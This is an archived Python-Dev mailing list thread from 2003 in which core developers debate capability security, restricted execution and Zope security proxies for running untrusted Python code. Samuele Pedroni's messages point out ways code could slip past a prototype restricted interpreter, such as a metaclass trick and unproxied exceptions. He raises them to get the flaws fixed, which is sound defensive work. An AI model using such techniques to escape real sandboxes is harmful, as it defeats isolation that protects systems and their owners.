> don't need anything but the ability to restrict imports and other
> unproxied access to sys.modules to use proxies.

Turns out this was another terminology misunderstanding.  I think of
the ability to overload __import__ and set __builtins__ as part of the
restricted execution implementation, because that's why they were
implemented.  Jim thought that these were separate features, and that
restricted execution in the interpreter only referred to the closing
off of some introspection attributes (e.g. im_self, __dict__ and
func_globals).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy@zope.com  Mon Mar 10 16:59:26 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 10 Mar 2003 11:59:26 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <200303091203.h29C3Iu04731@pcp02138704pcs.reston01.va.comcast.net>
References: <15930.48758.62473.425111@slothrop.zope.com>
 <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org>
 <15933.30607.900530.370402@localhost.localdomain>
 <3E635BD3.9000107@algroup.co.uk>
 <1046981657.15348.80.camel@slothrop.zope.com>
 <3E68AAF4.3060508@algroup.co.uk> <3E6B258B.2080207@zope.com>
 <200303091203.h29C3Iu04731@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1047315566.15066.7.camel@slothrop.zope.com>

On Sun, 2003-03-09 at 07:03, Guido van Rossum wrote:
> [Jim]
> > You don't need restricted execution to make proxies work.
> 
> Um, I think that's a dangerous mistake, or a confusion in terminology.
> 
> Without restricted execution, untrusted code would have access to
> sys.modules, and from there it would be able to access
> removeAllProxies.

Guido and I discovered that we were not using the same terminology in
our own discussions.  Guido suggests the following terms:

rexec -- the rexec module in the Python standard library
restricted execution -- the features in the Python code depending on
    PyEval_GetRestricted().

We still need a term to refer to an arbitrary mechanism for providing a
secure environment for untrusted code.  (I had been using "restricted
execution" to mean this.)  Perhaps a "safe interpreter"?

Jeremy


From jim@zope.com  Mon Mar 10 17:10:29 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 12:10:29 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: <025c01c2e71b$e7a3cc40$6d94fea9@newmexico>
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org> <025c01c2e71b$e7a3cc40$6d94fea9@newmexico>
Message-ID: <3E6CC705.7000901@zope.com>

Samuele Pedroni wrote:
> From: "Ka-Ping Yee" <ping@zesty.ca>
> 
>>However, there is still the problem that the established technique
>>for storing instance-specific state in Python is to use globally-
>>accessible data attributes instead of a limited scope.  We would
>>also need to add a safe (private) place for instances to put state.
> 
> 
> Indeed, that's the fact that implementations of methods are normal functions
> that access the instance attributes like everything else do,
> that's why Zope-proxies become necessary (and a bit brittle):
> 
> class A:
>  def geta(self):
>     return self.a # 1
> 
> a=A()
> 
> a.a # 2
> 
> (1) and (2) are using the same operation/execution path.

This points out a nice feature of zope proxies.  The proxied
object's methods are called with an unproxied self, so you can
easily allow access to the object's methods without providing access
to other attributes. Or, equivalently, you can provide access to
one set of methods and those methods can use other methods that
you don't provide access to.

Could you explain why you say that zope proxies are brittle?

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jeremy@zope.com  Mon Mar 10 17:18:29 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 10 Mar 2003 12:18:29 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <E18s06J-0006ZD-00@localhost>
References: <E18s06J-0006ZD-00@localhost>
Message-ID: <1047316709.15064.22.camel@slothrop.zope.com>

On Sun, 2003-03-09 at 07:40, Zooko wrote:
> 3.  A standard library that follows the Principle of Least Privilege.  That is, 
> a library full of tools that you can extend to an object in order to empower it 
> to do specific things (e.g. __builtin__.abs(), os.times(), ...) without thereby 
> also empowering it to do other things (e.g. __builtin__.file(), os.system(), 
> ...).  Python doesn't have such a library.
> 
> Now the Principle of Least Privilege approach to making a library safe is very 
> different from the "sandbox" approach.  The latter is to remove all "dangerous" 
> tools from the toolbox (or in our case, to have them dynamically disabled by the 
> "restricted" bit which is determined by an overridable policy).  The former is 
> to separate the tools so that dangerous ones don't come tied together with 
> common ones.  The security policy, then, is expressed by code that grants or 
> withholds capabilities (== references) rather than by code that toggles the 
> "restricted" bit.
> 
> Of course, you can start by denying the entire standard library to restricted 
> code, and then incrementally refactor the library or wrap it in Least-Privilege 
> wrappers.
> 
> Until you have a substantial Least-Privilege-respecting library you can't gain 
> the big benefit of capabilities -- code which is capable of doing something 
> useful without also being capable of doing harm.  (You can gain the "sandbox" 
> style of security -- code which is incapable of doing anything useful or 
> harmful.)

If you need to rewrite all the libraries to be capability-aware, then
you need to trust everyone who writes library code to understand
capabilities and be thorough enough to get them right.  I think this
exacerbates the current problem of restricted execution in Python:  The
responsibility for making the system secure is spread through the
interpreter.  To do an audit to convince yourself the system is secure,
you have to look at a lot of the interpreter.  I don't see how it would
help to add the standard library to the mix.

It seems like we have a conflict between two design principles --
economy of mechanism and least privelege.

> P.S.  I learned this three-part paradigm from Mark Miller whose paper with Chip 
> Morningstar and Bill Frantz articulates it in more detail:
> 
> http://www.erights.org/elib/capability/ode/ode-capabilities.html#patt-coop

I don't see the part of this paper that talks about library design :-). 
I assume that it's the first section "Only Connectivity Begets
Connectivity."  But I don't know if I understand how that applies to
library design in concrete terms.

Jeremy


From jeremy@alum.mit.edu  Mon Mar 10 17:26:26 2003
From: jeremy@alum.mit.edu (Jeremy Hylton)
Date: 10 Mar 2003 12:26:26 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <05a701c2e66f$6c001be0$6d94fea9@newmexico>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
 <3E69E1BC.5090508@algroup.co.uk>
 <1047150320.2347.26.camel@localhost.localdomain>
 <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico>
 <05a701c2e66f$6c001be0$6d94fea9@newmexico>
Message-ID: <1047317185.15066.29.camel@slothrop.zope.com>

On Sun, 2003-03-09 at 14:09, Samuele Pedroni wrote:
> maybe the question was unclear, but it was serious, what I was asking is
> whether some restricted code can do:
> 
> try:
>   deliberate code to force exception
> except Exception,e:
>  ...
> 
> so that e is caught unproxied. Looking at zope/security/_proxy.c it seems this
> can be the case...
> 
> then to be (likely) on the safe side, all exception class definitions for
> possible e classes: like e.g.
> 
> class MyExc(Exception):
>     ...
> 
> 
> ought to be executed _in restricted mode_, or be "trivial/empty": something
> like
> 
> class MyExc(Exception):
>     def __init__(self, msg):
>         self.message = msg
>         Exception.__init__(self, msg)
> 
>     def __str__(self):
>         return self.message
> 
> is already too much rope.
> 
> Although it seems not to have the "nice" two-level-of-calls behavior of Bastion
> instances, an unproxied instance of MyExc if MyExc was defined outside of
> restricted execution, can be used to break out of restricted execution.

Exceptions do seem like a problem.  If the exception objects are defined
in the safe interpreter, then untrusted code that catches an exception
can't follow references to an unsafe interpreter.  But it can modify the
exception objects and classes, which has the potential to cause a lot of
problems.

It also complicates the design of systems that want to run untrusted
code, because they must be very careful never to pass trusted exception
instances to untrusted code.

It seems like it would be nice if proxies could be used as exceptions,
so that there was a simple mechanism to enforce protection.

Jeremy


From jeremy@zope.com  Mon Mar 10 17:36:22 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 10 Mar 2003 12:36:22 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
Message-ID: <1047317782.15066.38.camel@slothrop.zope.com>

On Mon, 2003-03-10 at 05:51, Ka-Ping Yee wrote:
> It seems to me that the "rexec vs. proxy" debate is really about
> a very different question: How do we get from Python's currently
> promiscuous objects to properly restricted objects?

I think that's the right question.

> (Once we have properly restricted objects in either fashion, yes,
> definitely, using proxies to restrict access is a great technique.)
> 
> If i understand correctly, the "proxy" answer is "we create a
> special wrapper object, then the programmer has to individually
> wrap any object they want to be secure".  And the "rexec" answer
> is "we create an interpreter mode in which all objects are secure".

The proxy answer is a bit more complex.  Any object returned from a
proxy is itself wrapped in a proxy, except for immutable objects like
None, ints, and strings.  The initial proxy creates a barrier between
the code that created the proxy and the client that uses the proxy.

> I think the latter is far better.  To have any sort of real chance
> at establishing security, you have to start from a place where
> everything is secure, instead of starting from a place where
> everything is insecure and you have to individually secure every
> single object with its own wrapper.

It would indeed be impractical to wrap every object manually.  I think
both approaches tend towards the design principle of fail-safe defaults
and complete mediation.  A proxy mediates all access to the object it
wraps.  By default, it allows no access.  When it allows access, it
creates new proxies that provide the same facilities as the original. 
The one exception is for immutable objects.  (Immutability is good for
so many reasons.)

> The eventual ideal is to have a system where all objects are
> "pure" objects (i.e. non-introspectable capabilities) by default.
> Anyone wanting to do introspection would simply have to obtain
> the "introspect" capability from a privileged place (e.g. sys).
> For example,
> 
>     class Foo:
>         pass
> 
>     print Foo.__dict__                  # fails
> 
>     from sys import introspect
>     print introspect(Foo).__dict__      # succeeds
> 
> When running the interpreter in secure mode, "introspect"
> would just be missing from the sys module (again, ideally
> sys.introspect wouldn't exist by default, and a command-line
> option would turn it on, but i realize that's far away).
> 
> This would have the effect of the "introspectable flag" that
> Guido mentioned, but without expending any storage at all,
> until you actually needed to introspect something.

If Python's introspection were less ad hoc, I suppose this issue would
be easier to tackle.  (Has anyone done security design for a CLOS-style
meta-object protocol?)

Note that the biggest problem with the introspectable flag is that it
would need to be checked all over the interpreter internals.  For
example, the interpreter optimisizes bound method calls by extracting
the im_self and im_func and calling im_func directly passing im_self and
the rest of the arguments.  This is all done within the mainloop using a
single type check and a bunch of macros to extract fields from the bound
method.  It is pretty common to use macros that depend on the
representation of builtin types like functions, methods, dictionaries,
etc.

Jeremy


From zooko@zooko.com  Mon Mar 10 18:24:11 2003
From: zooko@zooko.com (Zooko)
Date: Mon, 10 Mar 2003 13:24:11 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: Message from Jeremy Hylton <jeremy@alum.mit.edu>
 of "10 Mar 2003 12:26:26 EST." <1047317185.15066.29.camel@slothrop.zope.com>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net> <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico> <05a701c2e66f$6c001be0$6d94fea9@newmexico>  <1047317185.15066.29.camel@slothrop.zope.com>
Message-ID: <E18sRwZ-0002zl-00@localhost>

 Jeremy Hylton <jeremy@alum.mit.edu> wrote:
>
> Exceptions do seem like a problem.

This reminds me of a similar problem.  Object A is a powerful object.  Object B 
is a proxy for A which passes through only a subset of A's methods.  So B is 
suitable to give to Object C, which should be able to use the B subset but not 
the full A set.

The problem is if the B subset of methods includes a callback idiom, in which 
Object A calls a function provided by its client and passes a reference to 
itself as an argument.

class A:
    def register_event_handler(self, handler):
        self.handlers.append(handler)

    def process_events(self):
        # ...
        for handler in self.handlers:
            handler(self)

This allows C full access to object A's methods if C has access to the 
register_event_handler() method.  (Even if A has private data and even if there 
is no flaw in the proxy or capability enforcement that prevents C from getting 
access to A through B.)

So the designer of the B proxy has to not only exclude dangerous methods of A, 
but also has to either exclude methods that lead to this kind of callback, or 
else make B a two-faced proxy that registers itself instead of C as the handler, 
forwards the callback, and passes a reference to itself instead of to A in the 
callback.

Regards,

Zooko


From pedronis@bluewin.ch  Mon Mar 10 18:53:08 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 10 Mar 2003 19:53:08 +0100
Subject: [Python-Dev] Capabilities
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org> <025c01c2e71b$e7a3cc40$6d94fea9@newmexico> <3E6CC705.7000901@zope.com>
Message-ID: <067a01c2e736$4af64920$6d94fea9@newmexico>

From: "Jim Fulton" <jim@zope.com>
>
> Could you explain why you say that zope proxies are brittle?
>

from my small experience playing with RestrictedIntepreter:

you wrap into proxies a lot of builtins:

*) 'object' for example, then
class C(object): ... does not work

but given that some basic types are left alone, one can use
Type = ''.__class__.__class__

class C:
  __metaclass__ = Type

*) iter seems not to work (deliberate decision or bug?)
*) proxied 'property' is unusable
*) built-in functions return proxies even if the argument were unproxied:

_12 = map(None,[1,2])

class A: pass
a = A()
a.a = [1,2]

_12 = getattr(a,'a')

in both cases with the proxied version of map and getattr the result _12 would
be a proxied list.

deliberate safer-side decisions?

I can see it both ways:
- see other mail

- map(None,[obj])[0] becomes a way to get a a proxied version of obj that can
be passed to code that would maybe unwrap it and believe
that is some other legit object.

regards.


From zooko@zooko.com  Mon Mar 10 20:11:04 2003
From: zooko@zooko.com (Zooko)
Date: Mon, 10 Mar 2003 15:11:04 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: Message from Jeremy Hylton <jeremy@zope.com>
 of "10 Mar 2003 12:18:29 EST." <1047316709.15064.22.camel@slothrop.zope.com>
References: <E18s06J-0006ZD-00@localhost>  <1047316709.15064.22.camel@slothrop.zope.com>
Message-ID: <E18sTc1-0003Fj-00@localhost>

(I, Zooko, wrote the lines prepended with "> > ".)

 Jeremy Hylton <jeremy@zope.com> wrote:
>
> > Until you have a substantial Least-Privilege-respecting library you can't gain 
> > the big benefit of capabilities -- code which is capable of doing something 
> > useful without also being capable of doing harm.  (You can gain the "sandbox" 
> > style of security -- code which is incapable of doing anything useful or 
> > harmful.)
> 
> If you need to rewrite all the libraries to be capability-aware, then
> you need to trust everyone who writes library code to understand
> capabilities and be thorough enough to get them right.

With capabilities, as with any other security regime, you can execute code while 
denying it access to any of the standard libraries.  However if you want to 
provide code access to some of the standard library's privileges without 
providing access to all of them, then you in any possible security regime need 
(a) some way to express which privileges it gets and which it doesn't, with 
sufficiently fine granularity that you can grant the privileges you want while 
excluding those you must, and (b) when actually executing the code you have to 
choose which specific privileges to extend.

In a capability secure language the first step, (a) is done by the language 
designer.  Then the library designer provides a library of bundles of 
privileges, and then (b) a programmer executes the code, passing to that code 
all and only those privileges which he wants that code to have.

The library designer's job is actually pretty easy -- just: 1.  try to make 
privileges which are likely to be wanted separately conveniently separable and 
2.  try to make privileges which are likely to be wanted together conveniently 
bundled.

If the library designers err on either side, the application programmer can 
patch it up.  For example, suppose the library designer made it so that a single 
object, the "os" object, contained both the "os.system()" method and the 
"os.times()" method, and the programmer wants to extend the ability to get a 
timestamp without extending the ability to invoke arbitrary commands.  (Note: 
I'm aware that os is a module and not an object, but for now I want to think of 
it as an object to be passed by reference instead of as a modules to be 
"import"'ed.  If we continue along the cap-Python path we'll have to come back 
to this.)

So the programmer just defines a proxy:

class osproxy:
    def __init__(self, os):
        self.os=os
    def times(self):
        return self.os.times()

and gives an instance of osproxy instead of the os object itself.  (In practice,
when it is only a single method, you would of course prefer to just pass the 
method itself.  The proxy pattern is more general.)

If the library designer has erred on the other side, making separate objects for 
each of a dozen different related and innocuous functions, the programmer will 
very likely define one object which contains all of those functions and pass a 
reference to that object where he would have had to pass a dozen references to a 
dozen functions.

I may have made too big a deal about this originally.  I just spent a few 
minutes browsing through modindex.html (parts of which I am already intimately 
familiar with), and nothing jumped out at me as needing to be wrapped or 
refactored before it could be used in a cap-Python.  Perhaps the Python Standard 
Library's natural modularity has already gotten us most of the way there.


> > http://www.erights.org/elib/capability/ode/ode-capabilities.html#patt-coop
> 
> I don't see the part of this paper that talks about library design :-). 
> I assume that it's the first section "Only Connectivity Begets
> Connectivity."  But I don't know if I understand how that applies to
> library design in concrete terms.

No, "Only Connectivity Begets Connectivity" is just the "pointer-safety" 
requirement -- that one can't get a reference to an object, except by either 
(a) creating the object, or (b) getting the reference from some other object 
which already had the reference.

Hm.  Yes, that page doesn't really talk about library design.  The authors of 
E performed a project [1] for DARPA in which they implemented a web browser 
which could host pluggable renderers, such that a malicious renderer was 
constrained in the damage it could do.  (I have no idea what DARPA wants with 
such a thing.  ;-))

The security review team at the conclusion of the project (which included great 
cryptographer David Wagner) wrote [2] that E appeared to have advanced the state 
of the art without breaking a sweat.  The security flaws that they uncovered 
were mostly due to insufficient wrapping of the Java standard libraries.  For 
example, the E folks had allowed an object to access a Java "File" object so 
that it could access a single file, without realizing that the Java File object 
has a "getParentFile()" method which returns the parent directory.

That was why I made such a big deal about the importance of a secure standard 
library in my previous message.  (As you know, Python's file objects don't have 
a "getParentFile()" method, so we're already one step ahead of Java there...)

Regards,

Zooko

[1] http://www.combex.com/tech/darpaBrowser.html
[2] http://www.combex.com/papers/darpa-review/index.html


From greg@cosc.canterbury.ac.nz  Mon Mar 10 20:23:10 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 11 Mar 2003 09:23:10 +1300 (NZDT)
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
Message-ID: <200303102023.h2AKNAw23873@oma.cosc.canterbury.ac.nz>

Ka-Ping Yee <ping@zesty.ca>:

> The eventual ideal is to have a system where all objects are
> "pure" objects (i.e. non-introspectable capabilities) by default.

Perhaps it would be useful to distinguish between what
might be called "read-only" introspection, and more
powerful forms of introspection.

Usually it doesn't do any harm to be able to find out
things like what class an object belongs to and what
methods it supports, so perhaps these kinds of
introspections don't need to be restricted by default.

But more intrusive things like reading/writing arbitrary
attributes or calling arbitrary methods would require
special permission.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Mon Mar 10 20:59:59 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 11 Mar 2003 09:59:59 +1300 (NZDT)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303101538.h2AFcTR12087@odiug.zope.com>
Message-ID: <200303102059.h2AKxxR24396@oma.cosc.canterbury.ac.nz>

Guido:

> That flag wasn't my idea, it was some one else's (Greg Ewing?).

Yes, it was my idea. I was thinking that there was already a word of
flags in the object struct that might have some room left, but I may
have been thinking of type objects.

I'm not sure it's such a good idea now anyway.  As has been pointed
out, you'd still need proxies of some kind to restrict interfaces. It
would just mean you'd be able to build your proxy out of any suitable
type of object.

The other idea was that trusted code would be able to set the flag on
all the objects that it passed to untrusted code, instead of having to
proxy them all. But, as has also been pointed out, that's a rather
brittle way to enforce security.

I think I agree that to really get on top of this security business we
need to move towards having dangerous things forbidden by default
rather than allowed by default.

To that end, it would be useful if we could pin down exactly what's
dangerous and what isn't.  It seems to me that most uses of
introspection by most programs are harmless. Can we sort out those
(hopefully few) things that are dangerous, and separate them from the
existing introspection mechanisms?

Access to sys.modules has been mentioned as a key thing that needs to
be restricted. Maybe this shouldn't be an arbitrarily-accessible
variable?  Maybe the sys module shouldn't be a module at all, but some
special object that won't let you do nasty things with its contents
unless you've got special privileges (which most code would *not*
have by default). 

One of the "nasty" things would be picking the real __builtins__ out
of sys.modules. Are there any others?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From zooko@zooko.com  Mon Mar 10 21:15:18 2003
From: zooko@zooko.com (Zooko)
Date: Mon, 10 Mar 2003 16:15:18 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: Message from Guido van Rossum <guido@python.org>
 of "Sun, 09 Mar 2003 20:10:36 EST." <200303100110.h2A1AaC06743@pcp02138704pcs.reston01.va.comcast.net>
References: <E18s06J-0006ZD-00@localhost>  <200303100110.h2A1AaC06743@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <E18sUcB-0003SH-00@localhost>

(I, Zooko, wrote the lines prepended with "> > ".)

 Guido wrote:
>
> > The [Principle-of-Least-Privilege approach to securing a standard library]
> > is to separate the tools so that dangerous ones don't come tied together
> > with common ones.  The security policy, then, is expressed by code that
> > grants or withholds capabilities (== references) rather than by code that
> > toggles the "restricted" bit.
>
> This sounds interesting, but I'm not sure I follow it.  Can you
> elaborate by giving a couple of examples?

First let me say that "capability access control" [1] is a theoretical 
construct, comparable to "access control lists" [2] and "Trust Management" [3].
Each is a formal model for specifying access control rules -- who is allowed to 
do what.

But in the context of Python we are interested not only in the theoretical 
model but also in a specific way of implementing it -- by making object 
references unforgeable and binding all authorities to object references.

So in this discussion it may not be clear whether a claimed advantage of
"capabilities" flows from the formal model or from the practice of unifying
security programming with object oriented programming.  I don't think it is 
important to differentiate in this discussion.

Now for examples...

Hm, well first of all, where are rexec and Zope proxies currently used?  
I believe that a "cap-Python" would support those uses, implementing the same 
security policies, but more cleanly since access control would be a first-class 
part of the language.

I don't know Zope very well, and rather than guess, I'd like to ask someone who
does know Zope to give a typical example of how proxies are used in workaday 
Zope.  I suspect that capabilities are quite similar to Zope proxies.


Now for a quick made-up example to demonstrate what I meant about expressing
security policy above, consider a tic-tac-toe game that is supposed to draw to
the screen.

In "restricted Python v1", certain modules have been flagged as "safe" and others 
"unsafe".  Code can execute other code with a "restricted" flag set, something 
like this:

# restricted Python v1
game = eval(TicTacToeGame, restricted=True)
game.display()

Unfortunately, in "restricted Python v1", all of the modules that allow drawing 
to the screen are marked as "unsafe", so the tic-tac-toe-game immediately dies 
with an exception.

In "restricted Python v2", an arbitrary security policy can be implemented:

# restricted Python v2
games=[]
def securitypolicy(subject, action, object):
    if ((subject in games) and (action == "import") and (object == "wxPython")) or
        (subject in games) and (action == "execute") and (object == "wxPython.Window") or
        (subject in games) and (action == "execute") and (object == "wxPython.Window.paint")):
        return True
    # ...
    return False

game = eval(TicTacToeGame, policy=securitypolicy)
gameobjh.append(game)
game.display()

I think that the "rexec" design was along the lines of "restricted Python v2", 
but I apologize if this simple analogy insults anyone.

I'm not sure whether "restricted Python v2" is expressive enough to implement 
the capability security access control model or not, but I don't care, because 
I don't like "restricted Python v2".  I like restricted Python v3:

# restricted Python v3
game = TicTacToeGame()
game.display(wxPython.wxWindow())

Now the game object has a reference to the window object, and it can use that 
reference to draw the pictures.  If I later change this design and decide that 
instead of drawing to a window, I want the game to write to a file, then I'll 
change the implementation of the TicTacToeGame class, and then'll I'll come back 
here to this code and change it from passing a wxWindows to:

# restricted Python v3
game = TicTacToeGame()
game.display(open("/tmp/tttgame.out","w"))

Now if I were writing in "restricted Python v2", then in addition to those two 
changes I would also have to make a third change, which is to edit my 
securitypolicy function in order to allow this particular game object to access 
a file named "/tmp/tttgame.out", and to disallow it access to wxPython:

# restricted Python v2
def securitypolicy(subject, action, object):
    if (subject in games) and (action in ("read", "write",)) and (object == "file:/tmp/tttgame.out"):
        return True
    # ...
    return False

game = TicTacToeGame()
game.display("/tmp/tttgame.out")

This is what I meant by saying that the security policy is expressed in Python 
instead of by twiddling access bits in an embedded policy language.  In a 
capability-secure language, the change (which the programmer has to make anyway), 
from "wxPython.wxWindows()" to "open('/tmp/tttgame.out', 'w')" is necessary and 
sufficient to enforce the programmer's intended security policy, so there is no 
need for the redundant and brittle "policy" function.

I find this unification access control and application logic to resonate deeply 
with the Zen of Python.

Regards,

Zooko

[1] http://www.eros-os.org/papers/shap-thesis.ps
[2] http://www.research.microsoft.com/~lampson/09-Protection/Acrobat.pdf
[3] http://citeseer.nj.nec.com/blaze96decentralized.html


From jim@zope.com  Mon Mar 10 21:16:02 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 16:16:02 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: <067a01c2e736$4af64920$6d94fea9@newmexico>
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org> <025c01c2e71b$e7a3cc40$6d94fea9@newmexico> <3E6CC705.7000901@zope.com> <067a01c2e736$4af64920$6d94fea9@newmexico>
Message-ID: <3E6D0092.6050404@zope.com>

Samuele Pedroni wrote:
> From: "Jim Fulton" <jim@zope.com>
> 
>>Could you explain why you say that zope proxies are brittle?
>>
> 
> 
> from my small experience playing with RestrictedIntepreter:

Um, er, I've been meaning to mention that RestrictedIntepreter is
not does and isn't used anywhere yet. It's a bit of a decoy
at this time. :]

At this point, RestrictedIntepreter is really an incomplete prototype.

OTOH, RestrictedBuiltins is used for Python expressions
in Zope page templates. Simple Python expressions in zpt
don't tend to run into the sorts of problems you've found.

> you wrap into proxies a lot of builtins:
> 
> *) 'object' for example, then
> class C(object): ... does not work

Right. We will fix this. It should be possible to subclass
proxied classes. The resulting classes should then be proxies.
object and type should probably be special cases.

> but given that some basic types are left alone, one can use
> Type = ''.__class__.__class__
> 
> class C:
>   __metaclass__ = Type


> *) iter seems not to work (deliberate decision or bug?)

bug I imagine.

> *) proxied 'property' is unusable

ditto

> *) built-in functions return proxies even if the argument were unproxied:
 >
> _12 = map(None,[1,2])

Interesting case. It looks like map shouldn't be proxied.

> class A: pass
> a = A()
> a.a = [1,2]
> 
> _12 = getattr(a,'a')

Ditto.

> in both cases with the proxied version of map and getattr the result _12 would
> be a proxied list.
> 
> deliberate safer-side decisions?

no.


> I can see it both ways:
> - see other mail

I don't know what other mail you are refering to. Maybe it doesn't matter.

> - map(None,[obj])[0] becomes a way to get a a proxied version of obj that can
> be passed to code that would maybe unwrap it and believe
> that is some other legit object.

Any code that unwraps proxies should be viewed with great suspicion.
I currently consider any use of that API without an extensive accompanying
comment to be a virtual "XXX" comment.

I'm sorry to have had you spend so much time on what is a bit od a decoy.
OTOH, you've pointed out a number of points that we do need to address to
move our RestrictedInterpreter beyond the prototype stage.

You've found a number of problems and issues in deciding how to proxy
builtins. I would argue that these are not problems in the proxies
themselves but in the applications to builtins. But perhaps I'm wrong.

Another area that we haven't dealt with yet is how proxies will work in
untrusted *persistent* modules. But you probably don't want to know
about that. ;)

Jim


-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From pedronis@bluewin.ch  Mon Mar 10 21:26:41 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 10 Mar 2003 22:26:41 +0100
Subject: [Python-Dev] Capabilities
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org> <025c01c2e71b$e7a3cc40$6d94fea9@newmexico> <3E6CC705.7000901@zope.com> <067a01c2e736$4af64920$6d94fea9@newmexico> <3E6D0092.6050404@zope.com>
Message-ID: <0b3e01c2e74b$bdff8c00$6d94fea9@newmexico>

From: "Jim Fulton" <jim@zope.com>

> > I can see it both ways:
> > - see other mail
>
> I don't know what other mail you are refering to. Maybe it doesn't matter.

the other side of the coin, is that with a working unproxied/non-proxying
property and/or a non-proxied map&getattr

and a unproxied MyExc instance,

I can break out restricted execution.


From pedronis@bluewin.ch  Mon Mar 10 22:14:44 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 10 Mar 2003 23:14:44 +0100
Subject: [Python-Dev] Capabilities
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org> <025c01c2e71b$e7a3cc40$6d94fea9@newmexico> <3E6CC705.7000901@zope.com> <067a01c2e736$4af64920$6d94fea9@newmexico> <3E6D0092.6050404@zope.com>
Message-ID: <0c5a01c2e752$74c99e20$6d94fea9@newmexico>

From: "Jim Fulton" <jim@zope.com>
> Samuele Pedroni wrote:
> > From: "Jim Fulton" <jim@zope.com>
> >
> >>Could you explain why you say that zope proxies are brittle?
> >>
> >
> >
> > from my small experience playing with RestrictedIntepreter:
>
> Um, er, I've been meaning to mention that RestrictedIntepreter is
> not does and isn't used anywhere yet. It's a bit of a decoy
> at this time. :]

I knew it isn't used. I'm not that naive, it seemed nevertheless a
show-case/playground of proxy+restricted execution approach.

regards.


From jepler@unpythonic.net  Mon Mar 10 01:27:26 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Sun, 9 Mar 2003 19:27:26 -0600
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <200303092252.h29Mqdk17019@oma.cosc.canterbury.ac.nz>
References: <BIEJKCLHCIOIHAGOKOLHAEMGFBAA.tim.one@comcast.net> <200303092252.h29Mqdk17019@oma.cosc.canterbury.ac.nz>
Message-ID: <20030310012724.GA1144@unpythonic.net>

[attribution lost]
> > Those would be quite different functions, then, unless you proposed to have
> > Python interpret native shell metacharacters on its own too (e.g., set up
> > pipes, do the indicated file redirections, interpolate envars, and fake
> > whatever other shell gimmicks people may use).

On Mon, Mar 10, 2003 at 11:52:39AM +1300, Greg Ewing wrote:
> What we need is a function which does all those things,
> but uses some way of specifying them *other* than shell
> metacharacters. E.g.
> 
>   os.plumb(("sed", "-e", "s/dead/resting/", "parrots"), 
>     ("grep", "norwegian"), output = myfile))

+1 on the concept.  +1 on something that can be transformed to use tcl's
"exec" so that it'll begin working on several common arches immediately.

Jeff


From tim.one@comcast.net  Tue Mar 11 00:41:42 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 10 Mar 2003 19:41:42 -0500
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <20030310012724.GA1144@unpythonic.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBIEAAB.tim.one@comcast.net>

[Greg Ewing]
> What we need is a function which does all those things,
> but uses some way of specifying them *other* than shell
> metacharacters. E.g.
>
>   os.plumb(("sed", "-e", "s/dead/resting/", "parrots"),
>     ("grep", "norwegian"), output = myfile))

[Jeff Epler]
> +1 on the concept.  +1 on something that can be transformed to use tcl's
> "exec" so that it'll begin working on several common arches immediately.

They're really the same thing -- Tcl's exec would be a simple transformation
of a cross-platform sh-like syntax into Greg's hypothesized functions.  The
pain in Tcl's exec implementation was in providing the functionality across
